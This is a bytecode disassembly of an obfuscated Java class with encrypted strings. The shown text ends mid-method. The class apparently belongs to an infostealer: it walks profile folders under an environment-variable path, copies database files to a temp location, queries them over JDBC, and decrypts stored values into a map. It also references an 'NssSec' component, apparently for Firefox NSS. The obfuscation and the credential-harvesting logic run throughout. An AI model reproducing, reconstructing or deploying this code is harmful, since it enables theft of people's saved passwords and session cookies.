Compiled from "g.java"
public class a.b.d.g {
  private static final java.lang.String D;

  private static int o;

  private static int U;

  private static int p;

  private static int y;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] c;

  private static final java.lang.Long[] d;

  public a.b.d.g();
    Code:
         0: aload_0
         1: invokespecial #180                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #381                // long 72100000738417l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #373                // long 96564248572506l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #142                // Field o:I
        16: iconst_0
        17: putstatic     #141                // Field U:I
        20: iconst_0
        21: putstatic     #28                 // Field p:I
        24: iconst_0
        25: putstatic     #270                // Field y:I
        28: ldc           #17                 // int -384690450
        30: sipush        -26559
        33: i2c
        34: ineg
        35: iadd
        36: ldc           #17                 // int -384690450
        38: sipush        -11509
        41: i2c
        42: ineg
        43: iadd
        44: lload_0
        45: l2i
        46: invokestatic  #271                // Method a:(III)Ljava/lang/String;
        49: invokestatic  #158                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        52: ldc           #17                 // int -384690450
        54: sipush        -26538
        57: i2c
        58: ineg
        59: iadd
        60: ldc           #12                 // int 384690450
        62: sipush        -25926
        65: i2c
        66: iadd
        67: lload_0
        68: l2i
        69: invokestatic  #271                // Method a:(III)Ljava/lang/String;
        72: invokestatic  #51                 // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        75: ldc           #17                 // int -384690450
        77: sipush        -26527
        80: i2c
        81: ineg
        82: iadd
        83: ldc           #17                 // int -384690450
        85: sipush        -19073
        88: i2c
        89: ineg
        90: iadd
        91: lload_0
        92: l2i
        93: invokestatic  #271                // Method a:(III)Ljava/lang/String;
        96: invokedynamic #345,  0            // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       101: astore        4
       103: aload         4
       105: ldc           #15                 // String
       107: invokestatic  #69                 // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
       110: aload         4
       112: lload_2
       113: iconst_2
       114: anewarray     #366                // class java/lang/Object
       117: dup_x2
       118: dup_x2
       119: pop
       120: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       123: iconst_1
       124: swap
       125: aastore
       126: dup_x1
       127: swap
       128: iconst_0
       129: swap
       130: aastore
       131: invokestatic  #66                 // Method F:([Ljava/lang/Object;)V
       134: ldc           #17                 // int -384690450
       136: sipush        -26531
       139: i2c
       140: ineg
       141: iadd
       142: ldc           #12                 // int 384690450
       144: sipush        -17167
       147: i2c
       148: iadd
       149: lload_0
       150: l2i
       151: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       154: ldc           #17                 // int -384690450
       156: sipush        -26575
       159: i2c
       160: ineg
       161: iadd
       162: ldc           #12                 // int 384690450
       164: sipush        -15830
       167: i2c
       168: iadd
       169: lload_0
       170: l2i
       171: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       174: getstatic     #142                // Field o:I
       177: invokestatic  #193                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       180: ldc           #17                 // int -384690450
       182: sipush        -26564
       185: i2c
       186: ineg
       187: iadd
       188: ldc           #12                 // int 384690450
       190: sipush        -21433
       193: i2c
       194: iadd
       195: lload_0
       196: l2i
       197: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       200: ldc           #17                 // int -384690450
       202: sipush        -26528
       205: i2c
       206: ineg
       207: iadd
       208: ldc           #17                 // int -384690450
       210: sipush        -4787
       213: i2c
       214: ineg
       215: iadd
       216: lload_0
       217: l2i
       218: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       221: getstatic     #141                // Field U:I
       224: invokestatic  #193                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       227: ldc           #17                 // int -384690450
       229: sipush        -26564
       232: i2c
       233: ineg
       234: iadd
       235: ldc           #12                 // int 384690450
       237: sipush        -21433
       240: i2c
       241: iadd
       242: lload_0
       243: l2i
       244: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       247: ldc           #17                 // int -384690450
       249: sipush        -26561
       252: i2c
       253: ineg
       254: iadd
       255: ldc           #12                 // int 384690450
       257: sipush        -12052
       260: i2c
       261: iadd
       262: lload_0
       263: l2i
       264: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       267: getstatic     #28                 // Field p:I
       270: invokestatic  #193                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       273: ldc           #17                 // int -384690450
       275: sipush        -26564
       278: i2c
       279: ineg
       280: iadd
       281: ldc           #12                 // int 384690450
       283: sipush        -21433
       286: i2c
       287: iadd
       288: lload_0
       289: l2i
       290: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       293: ldc           #17                 // int -384690450
       295: sipush        -26540
       298: i2c
       299: ineg
       300: iadd
       301: ldc           #12                 // int 384690450
       303: sipush        -22043
       306: i2c
       307: iadd
       308: lload_0
       309: l2i
       310: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       313: getstatic     #270                // Field y:I
       316: invokestatic  #193                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       319: return

  private static void F(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #249                // class java/lang/String
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #79                 // class java/lang/Long
        14: invokevirtual #56                 // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: pop
        19: lload_2
        20: dup2
        21: ldc2_w        #369                // long 106256176670564l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #274                // Field a/b/d/dec$NssSec.m:Z
        31: new           #253                // class java/io/File
        34: dup
        35: aload_1
        36: invokespecial #153                // Method java/io/File."<init>":(Ljava/lang/String;)V
        39: astore        7
        41: istore        6
        43: aload         7
        45: iload         6
        47: ifne          114
        50: invokevirtual #121                // Method java/io/File.exists:()Z
        53: ifne          62
        56: goto          60
        59: athrow
        60: return
        61: athrow
        62: lload         4
        64: aload         7
        66: ldc           #9                  // int -190182570
        68: sipush        -32345
        71: i2c
        72: ineg
        73: isub
        74: ldc           #4                  // int 190182570
        76: sipush        -32375
        79: i2c
        80: isub
        81: lload_2
        82: l2i
        83: invokestatic  #271                // Method a:(III)Ljava/lang/String;
        86: iconst_3
        87: anewarray     #366                // class java/lang/Object
        90: dup_x1
        91: swap
        92: iconst_2
        93: swap
        94: aastore
        95: dup_x1
        96: swap
        97: iconst_1
        98: swap
        99: aastore
       100: dup_x2
       101: dup_x2
       102: pop
       103: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       106: iconst_0
       107: swap
       108: aastore
       109: invokestatic  #240                // Method Z:([Ljava/lang/Object;)V
       112: aload         7
       114: invokevirtual #47                 // Method java/io/File.listFiles:()[Ljava/io/File;
       117: astore        8
       119: aload         8
       121: iload         6
       123: ifne          136
       126: ifnonnull     134
       129: goto          133
       132: athrow
       133: return
       134: aload         8
       136: astore        9
       138: aload         9
       140: arraylength
       141: istore        10
       143: iconst_0
       144: istore        11
       146: iload         11
       148: iload         10
       150: if_icmpge     499
       153: aload         9
       155: iload         11
       157: aaload
       158: astore        12
       160: iload         6
       162: lload_2
       163: lconst_0
       164: lcmp
       165: iflt          496
       168: ifne          494
       171: aload         12
       173: invokevirtual #202                // Method java/io/File.isDirectory:()Z
       176: ifeq          491
       179: goto          183
       182: athrow
       183: aload         12
       185: iload         6
       187: ifne          348
       190: goto          194
       193: athrow
       194: lload_2
       195: lconst_0
       196: lcmp
       197: iflt          344
       200: invokevirtual #88                 // Method java/io/File.getName:()Ljava/lang/String;
       203: ldc           #9                  // int -190182570
       205: sipush        -32393
       208: i2c
       209: ineg
       210: isub
       211: ldc           #9                  // int -190182570
       213: sipush        -29963
       216: i2c
       217: ineg
       218: isub
       219: lload_2
       220: l2i
       221: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       224: invokevirtual #29                 // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       227: ifne          279
       230: goto          234
       233: athrow
       234: aload         12
       236: iload         6
       238: ifne          348
       241: goto          245
       244: athrow
       245: invokevirtual #88                 // Method java/io/File.getName:()Ljava/lang/String;
       248: ldc           #9                  // int -190182570
       250: sipush        -32355
       253: i2c
       254: ineg
       255: isub
       256: ldc           #9                  // int -190182570
       258: sipush        -24419
       261: i2c
       262: ineg
       263: isub
       264: lload_2
       265: l2i
       266: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       269: invokevirtual #73                 // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       272: ifeq          491
       275: goto          279
       278: athrow
       279: lload         4
       281: aload         12
       283: aload         12
       285: invokevirtual #88                 // Method java/io/File.getName:()Ljava/lang/String;
       288: iconst_3
       289: anewarray     #366                // class java/lang/Object
       292: dup_x1
       293: swap
       294: iconst_2
       295: swap
       296: aastore
       297: dup_x1
       298: swap
       299: iconst_1
       300: swap
       301: aastore
       302: dup_x2
       303: dup_x2
       304: pop
       305: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       308: iconst_0
       309: swap
       310: aastore
       311: invokestatic  #240                // Method Z:([Ljava/lang/Object;)V
       314: new           #253                // class java/io/File
       317: dup
       318: aload         12
       320: ldc           #9                  // int -190182570
       322: sipush        -32400
       325: i2c
       326: ineg
       327: isub
       328: ldc           #9                  // int -190182570
       330: sipush        -31318
       333: i2c
       334: ineg
       335: isub
       336: lload_2
       337: l2i
       338: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       341: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       344: goto          348
       347: athrow
       348: astore        13
       350: iload         6
       352: lload_2
       353: lconst_0
       354: lcmp
       355: ifle          366
       358: ifne          486
       361: aload         13
       363: invokevirtual #121                // Method java/io/File.exists:()Z
       366: lload_2
       367: lconst_0
       368: lcmp
       369: iflt          475
       372: ifeq          472
       375: goto          379
       378: athrow
       379: aload         13
       381: iload         6
       383: ifne          412
       386: goto          390
       389: athrow
       390: invokevirtual #202                // Method java/io/File.isDirectory:()Z
       393: lload_2
       394: lconst_0
       395: lcmp
       396: ifle          475
       399: ifeq          472
       402: goto          406
       405: athrow
       406: aload         13
       408: goto          412
       411: athrow
       412: aload         12
       414: invokevirtual #88                 // Method java/io/File.getName:()Ljava/lang/String;
       417: ldc           #9                  // int -190182570
       419: sipush        -32403
       422: i2c
       423: ineg
       424: isub
       425: ldc           #4                  // int 190182570
       427: sipush        -32175
       430: i2c
       431: isub
       432: lload_2
       433: l2i
       434: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       437: invokedynamic #230,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       442: lload         4
       444: dup2_x2
       445: pop2
       446: iconst_3
       447: anewarray     #366                // class java/lang/Object
       450: dup_x1
       451: swap
       452: iconst_2
       453: swap
       454: aastore
       455: dup_x1
       456: swap
       457: iconst_1
       458: swap
       459: aastore
       460: dup_x2
       461: dup_x2
       462: pop
       463: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       466: iconst_0
       467: swap
       468: aastore
       469: invokestatic  #240                // Method Z:([Ljava/lang/Object;)V
       472: sipush        7627
       475: ldc2_w        #379                // long 3549715498699451036l
       478: lload_2
       479: lxor
       480: invokestatic  #34                 // Method a:(IJ)J
       483: invokestatic  #175                // Method java/lang/Thread.sleep:(J)V
       486: goto          491
       489: astore        14
       491: iinc          11, 1
       494: iload         6
       496: ifeq          146
       499: return
      Exception table:
         from    to  target type
           390   408   411   Class java/lang/Exception
           379   402   405   Class java/lang/Exception
           361   386   389   Class java/lang/Exception
           350   375   378   Class java/lang/Exception
           245   344   347   Class java/lang/Exception
           234   275   278   Class java/lang/Exception
           194   241   244   Class java/lang/Exception
           183   230   233   Class java/lang/Exception
           171   190   193   Class java/lang/Exception
           160   179   182   Class java/lang/Exception
           119   129   132   Class java/lang/Exception
            50    61    61   Class java/lang/Exception
            43    56    59   Class java/lang/Exception
           472   486   489   Class java/lang/Exception

  private static void Z(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #79                 // class java/lang/Long
         7: invokevirtual #56                 // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #253                // class java/io/File
        17: astore_3
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #249                // class java/lang/String
        24: astore        4
        26: pop
        27: lload_1
        28: dup2
        29: ldc2_w        #385                // long 55392485061444l
        32: lxor
        33: lstore        5
        35: pop2
        36: getstatic     #274                // Field a/b/d/dec$NssSec.m:Z
        39: istore        13
        41: new           #253                // class java/io/File
        44: dup
        45: aload_3
        46: ldc           #20                 // int 1157741310
        48: sipush        -12438
        51: i2c
        52: isub
        53: ldc           #18                 // int -1157610240
        55: sipush        -4465
        58: i2c
        59: ineg
        60: iadd
        61: lload_1
        62: l2i
        63: invokestatic  #271                // Method a:(III)Ljava/lang/String;
        66: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        69: iload         13
        71: ifne          624
        74: invokevirtual #121                // Method java/io/File.exists:()Z
        77: ifne          164
        80: new           #253                // class java/io/File
        83: dup
        84: aload_3
        85: ldc           #20                 // int 1157741310
        87: sipush        -12458
        90: i2c
        91: isub
        92: ldc           #6                  // int -1157741310
        94: sipush        -2262
        97: i2c
        98: ineg
        99: isub
       100: lload_1
       101: l2i
       102: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       105: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       108: iload         13
       110: ifne          624
       113: invokevirtual #121                // Method java/io/File.exists:()Z
       116: ifne          164
       119: new           #253                // class java/io/File
       122: dup
       123: aload_3
       124: ldc           #20                 // int 1157741310
       126: sipush        -12444
       129: i2c
       130: isub
       131: ldc           #5                  // int 1157610240
       133: sipush        -8368
       136: i2c
       137: iadd
       138: lload_1
       139: l2i
       140: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       143: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       146: iload         13
       148: lload_1
       149: lconst_0
       150: lcmp
       151: ifle          631
       154: ifne          624
       157: invokevirtual #121                // Method java/io/File.exists:()Z
       160: ifne          164
       163: return
       164: lload         5
       166: aload_3
       167: ldc           #20                 // int 1157741310
       169: sipush        -12474
       172: i2c
       173: isub
       174: ldc           #5                  // int 1157610240
       176: sipush        -250
       179: i2c
       180: iadd
       181: lload_1
       182: l2i
       183: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       186: ldc           #20                 // int 1157741310
       188: sipush        -12440
       191: i2c
       192: isub
       193: ldc           #6                  // int -1157741310
       195: sipush        -15839
       198: i2c
       199: ineg
       200: isub
       201: lload_1
       202: l2i
       203: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       206: aload         4
       208: ldc           #20                 // int 1157741310
       210: sipush        -12419
       213: i2c
       214: isub
       215: ldc           #5                  // int 1157610240
       217: sipush        -13369
       220: i2c
       221: iadd
       222: lload_1
       223: l2i
       224: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       227: iconst_1
       228: bipush        7
       230: anewarray     #366                // class java/lang/Object
       233: dup_x1
       234: swap
       235: invokestatic  #145                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       238: bipush        6
       240: swap
       241: aastore
       242: dup_x1
       243: swap
       244: iconst_5
       245: swap
       246: aastore
       247: dup_x1
       248: swap
       249: iconst_4
       250: swap
       251: aastore
       252: dup_x1
       253: swap
       254: iconst_3
       255: swap
       256: aastore
       257: dup_x1
       258: swap
       259: iconst_2
       260: swap
       261: aastore
       262: dup_x1
       263: swap
       264: iconst_1
       265: swap
       266: aastore
       267: dup_x2
       268: dup_x2
       269: pop
       270: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       273: iconst_0
       274: swap
       275: aastore
       276: invokestatic  #68                 // Method c:([Ljava/lang/Object;)V
       279: lload         5
       281: aload_3
       282: ldc           #20                 // int 1157741310
       284: sipush        -12462
       287: i2c
       288: isub
       289: ldc           #5                  // int 1157610240
       291: sipush        -6669
       294: i2c
       295: iadd
       296: lload_1
       297: l2i
       298: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       301: ldc           #20                 // int 1157741310
       303: sipush        -12442
       306: i2c
       307: isub
       308: ldc           #5                  // int 1157610240
       310: sipush        -9252
       313: i2c
       314: iadd
       315: lload_1
       316: l2i
       317: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       320: aload         4
       322: ldc           #20                 // int 1157741310
       324: sipush        -12479
       327: i2c
       328: isub
       329: ldc           #20                 // int 1157741310
       331: sipush        -3311
       334: i2c
       335: isub
       336: lload_1
       337: l2i
       338: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       341: iconst_2
       342: bipush        7
       344: anewarray     #366                // class java/lang/Object
       347: dup_x1
       348: swap
       349: invokestatic  #145                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       352: bipush        6
       354: swap
       355: aastore
       356: dup_x1
       357: swap
       358: iconst_5
       359: swap
       360: aastore
       361: dup_x1
       362: swap
       363: iconst_4
       364: swap
       365: aastore
       366: dup_x1
       367: swap
       368: iconst_3
       369: swap
       370: aastore
       371: dup_x1
       372: swap
       373: iconst_2
       374: swap
       375: aastore
       376: dup_x1
       377: swap
       378: iconst_1
       379: swap
       380: aastore
       381: dup_x2
       382: dup_x2
       383: pop
       384: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       387: iconst_0
       388: swap
       389: aastore
       390: invokestatic  #68                 // Method c:([Ljava/lang/Object;)V
       393: lload         5
       395: aload_3
       396: ldc           #20                 // int 1157741310
       398: sipush        -12473
       401: i2c
       402: isub
       403: ldc           #6                  // int -1157741310
       405: sipush        -1591
       408: i2c
       409: ineg
       410: isub
       411: lload_1
       412: l2i
       413: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       416: ldc           #20                 // int 1157741310
       418: sipush        -12467
       421: i2c
       422: isub
       423: ldc           #5                  // int 1157610240
       425: sipush        -9272
       428: i2c
       429: iadd
       430: lload_1
       431: l2i
       432: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       435: aload         4
       437: ldc           #20                 // int 1157741310
       439: sipush        -12433
       442: i2c
       443: isub
       444: ldc           #20                 // int 1157741310
       446: sipush        -3998
       449: i2c
       450: isub
       451: lload_1
       452: l2i
       453: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       456: iconst_3
       457: bipush        7
       459: anewarray     #366                // class java/lang/Object
       462: dup_x1
       463: swap
       464: invokestatic  #145                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       467: bipush        6
       469: swap
       470: aastore
       471: dup_x1
       472: swap
       473: iconst_5
       474: swap
       475: aastore
       476: dup_x1
       477: swap
       478: iconst_4
       479: swap
       480: aastore
       481: dup_x1
       482: swap
       483: iconst_3
       484: swap
       485: aastore
       486: dup_x1
       487: swap
       488: iconst_2
       489: swap
       490: aastore
       491: dup_x1
       492: swap
       493: iconst_1
       494: swap
       495: aastore
       496: dup_x2
       497: dup_x2
       498: pop
       499: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       502: iconst_0
       503: swap
       504: aastore
       505: invokestatic  #68                 // Method c:([Ljava/lang/Object;)V
       508: lload         5
       510: aload_3
       511: ldc           #20                 // int 1157741310
       513: sipush        -12478
       516: i2c
       517: isub
       518: ldc           #5                  // int 1157610240
       520: sipush        -12531
       523: i2c
       524: iadd
       525: lload_1
       526: l2i
       527: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       530: ldc           #20                 // int 1157741310
       532: sipush        -12475
       535: i2c
       536: isub
       537: ldc           #20                 // int 1157741310
       539: sipush        -10228
       542: i2c
       543: isub
       544: lload_1
       545: l2i
       546: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       549: aload         4
       551: ldc           #20                 // int 1157741310
       553: sipush        -12428
       556: i2c
       557: isub
       558: ldc           #6                  // int -1157741310
       560: sipush        -12859
       563: i2c
       564: ineg
       565: isub
       566: lload_1
       567: l2i
       568: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       571: iconst_5
       572: bipush        7
       574: anewarray     #366                // class java/lang/Object
       577: dup_x1
       578: swap
       579: invokestatic  #145                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       582: bipush        6
       584: swap
       585: aastore
       586: dup_x1
       587: swap
       588: iconst_5
       589: swap
       590: aastore
       591: dup_x1
       592: swap
       593: iconst_4
       594: swap
       595: aastore
       596: dup_x1
       597: swap
       598: iconst_3
       599: swap
       600: aastore
       601: dup_x1
       602: swap
       603: iconst_2
       604: swap
       605: aastore
       606: dup_x1
       607: swap
       608: iconst_1
       609: swap
       610: aastore
       611: dup_x2
       612: dup_x2
       613: pop
       614: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       617: iconst_0
       618: swap
       619: aastore
       620: invokestatic  #68                 // Method c:([Ljava/lang/Object;)V
       623: aload_3
       624: ldc           #20                 // int 1157741310
       626: sipush        -12451
       629: i2c
       630: isub
       631: ldc           #6                  // int -1157741310
       633: sipush        -8272
       636: i2c
       637: ineg
       638: isub
       639: lload_1
       640: l2i
       641: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       644: ldc           #20                 // int 1157741310
       646: sipush        -12427
       649: i2c
       650: isub
       651: ldc           #6                  // int -1157741310
       653: sipush        -6202
       656: i2c
       657: ineg
       658: isub
       659: lload_1
       660: l2i
       661: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       664: aload         4
       666: ldc           #20                 // int 1157741310
       668: sipush        -12420
       671: i2c
       672: isub
       673: ldc           #18                 // int -1157610240
       675: sipush        -4098
       678: i2c
       679: ineg
       680: iadd
       681: lload_1
       682: l2i
       683: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       686: iconst_4
       687: istore        7
       689: astore        8
       691: astore        9
       693: astore        10
       695: astore        11
       697: astore        12
       699: lload         5
       701: aload         12
       703: aload         11
       705: aload         10
       707: aload         9
       709: aload         8
       711: iload         7
       713: bipush        7
       715: anewarray     #366                // class java/lang/Object
       718: dup_x1
       719: swap
       720: invokestatic  #145                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       723: bipush        6
       725: swap
       726: aastore
       727: dup_x1
       728: swap
       729: iconst_5
       730: swap
       731: aastore
       732: dup_x1
       733: swap
       734: iconst_4
       735: swap
       736: aastore
       737: dup_x1
       738: swap
       739: iconst_3
       740: swap
       741: aastore
       742: dup_x1
       743: swap
       744: iconst_2
       745: swap
       746: aastore
       747: dup_x1
       748: swap
       749: iconst_1
       750: swap
       751: aastore
       752: dup_x2
       753: dup_x2
       754: pop
       755: invokestatic  #82                 // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       758: iconst_0
       759: swap
       760: aastore
       761: invokestatic  #68                 // Method c:([Ljava/lang/Object;)V
       764: return

  private static void c(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #79                 // class java/lang/Long
         7: invokevirtual #56                 // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #253                // class java/io/File
        17: astore_3
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #249                // class java/lang/String
        24: astore        4
        26: dup
        27: iconst_3
        28: aaload
        29: checkcast     #249                // class java/lang/String
        32: astore        5
        34: dup
        35: iconst_4
        36: aaload
        37: checkcast     #249                // class java/lang/String
        40: astore        6
        42: dup
        43: iconst_5
        44: aaload
        45: checkcast     #249                // class java/lang/String
        48: astore        7
        50: dup
        51: bipush        6
        53: aaload
        54: checkcast     #215                // class java/lang/Integer
        57: invokevirtual #337                // Method java/lang/Integer.intValue:()I
        60: istore        8
        62: pop
        63: getstatic     #274                // Field a/b/d/dec$NssSec.m:Z
        66: new           #253                // class java/io/File
        69: dup
        70: aload_3
        71: aload         4
        73: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        76: astore        10
        78: istore        9
        80: aload         10
        82: invokevirtual #121                // Method java/io/File.exists:()Z
        85: iload         9
        87: ifne          157
        90: ifne          143
        93: goto          97
        96: athrow
        97: iload         8
        99: iload         9
       101: ifne          157
       104: goto          108
       107: athrow
       108: iconst_2
       109: if_icmpne     143
       112: goto          116
       115: athrow
       116: new           #253                // class java/io/File
       119: dup
       120: aload_3
       121: ldc           #19                 // int 1415949210
       123: sipush        11616
       126: iadd
       127: ldc           #3                  // int -1415949210
       129: sipush        -8745
       132: isub
       133: lload_1
       134: l2i
       135: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       138: invokespecial #236                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       141: astore        10
       143: aload         10
       145: iload         9
       147: ifne          194
       150: invokevirtual #121                // Method java/io/File.exists:()Z
       153: goto          157
       156: athrow
       157: ifne          161
       160: return
       161: new           #253                // class java/io/File
       164: dup
       165: ldc           #19                 // int 1415949210
       167: sipush        11575
       170: iadd
       171: ldc           #3                  // int -1415949210
       173: sipush        -3746
       176: iadd
       177: lload_1
       178: l2i
       179: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       182: invokestatic  #259                // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       185: invokestatic  #64                 // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       188: invokevirtual #138                // Method java/util/UUID.toString:()Ljava/lang/String;
       191: invokespecial #90                 // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       194: astore        11
       196: aload         10
       198: iload         9
       200: ifne          243
       203: aload         11
       205: ldc           #19                 // int 1415949210
       207: sipush        11589
       210: iadd
       211: ldc           #3                  // int -1415949210
       213: sipush        -16890
       216: iadd
       217: lload_1
       218: l2i
       219: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       222: invokestatic  #91                 // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       225: lload_1
       226: lconst_0
       227: lcmp
       228: ifle          239
       231: ifne          241
       234: aload         11
       236: invokevirtual #216                // Method java/io/File.delete:()Z
       239: pop
       240: return
       241: aload         11
       243: invokevirtual #166                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       246: ldc           #19                 // int 1415949210
       248: sipush        11604
       251: iadd
       252: ldc           #19                 // int 1415949210
       254: sipush        20006
       257: iadd
       258: lload_1
       259: l2i
       260: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       263: swap
       264: invokedynamic #309,  0            // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       269: invokestatic  #268                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       272: astore        12
       274: aload         12
       276: invokeinterface #122,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       281: astore        13
       283: aload         13
       285: aload         5
       287: invokeinterface #206,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       292: astore        14
       294: new           #293                // class java/lang/StringBuilder
       297: dup
       298: invokespecial #100                // Method java/lang/StringBuilder."<init>":()V
       301: astore        15
       303: iload         8
       305: iconst_5
       306: iload         9
       308: ifne          834
       311: if_icmpne     818
       314: goto          318
       317: athrow
       318: new           #33                 // class java/util/HashMap
       321: dup
       322: invokespecial #281                // Method java/util/HashMap."<init>":()V
       325: astore        16
       327: aload         12
       329: invokeinterface #122,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       334: ldc           #19                 // int 1415949210
       336: sipush        11594
       339: iadd
       340: ldc           #19                 // int 1415949210
       342: sipush        4521
       345: iadd
       346: lload_1
       347: l2i
       348: invokestatic  #271                // Method a:(III)Ljava/lang/String;
       351: invokeinterface #206,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       356: astore        17
       358: aload         17
       360: invokeinterface #251,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       365: ifeq          437
       368: aload         17
       370: iconst_2
       371: invokeinterface #211,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       376: invokestatic  #225                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       379: astore        18
       381: aload         18
       383: iload         9
       385: lload_1
       386: lconst_0
       387: lcmp
       388: iflt          396
       391: ifne          1776
       394: iload         9
       396: ifne          431
       399: goto          403
       402: athrow
       403: ifnull        432
       406: goto          410
       409: athrow
       410: aload         16
       412: aload         17
       414: iconst_1
       415: invokeinterface #85,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       420: aload         18
       422: invokeinterface #203,  3          // InterfaceMethod java/util/Map.put:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
       427: goto          431
       430: athrow
       431: pop
       432: iload         9
       434: ifeq          358
       437: lload_1
       438: lconst_0
       439: lcmp
       440: ifle          470
       443: aload         17
       445: iload         9
       447: lload_1
       448: lconst_0
       449: lcmp
       450: ifle          371
       453: ifne          465
       456: ifnull        517
       459: goto          463
       462: athrow
       463: aload         17
       465: invokeinterface #162,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       470: goto          517
       473: astore        18
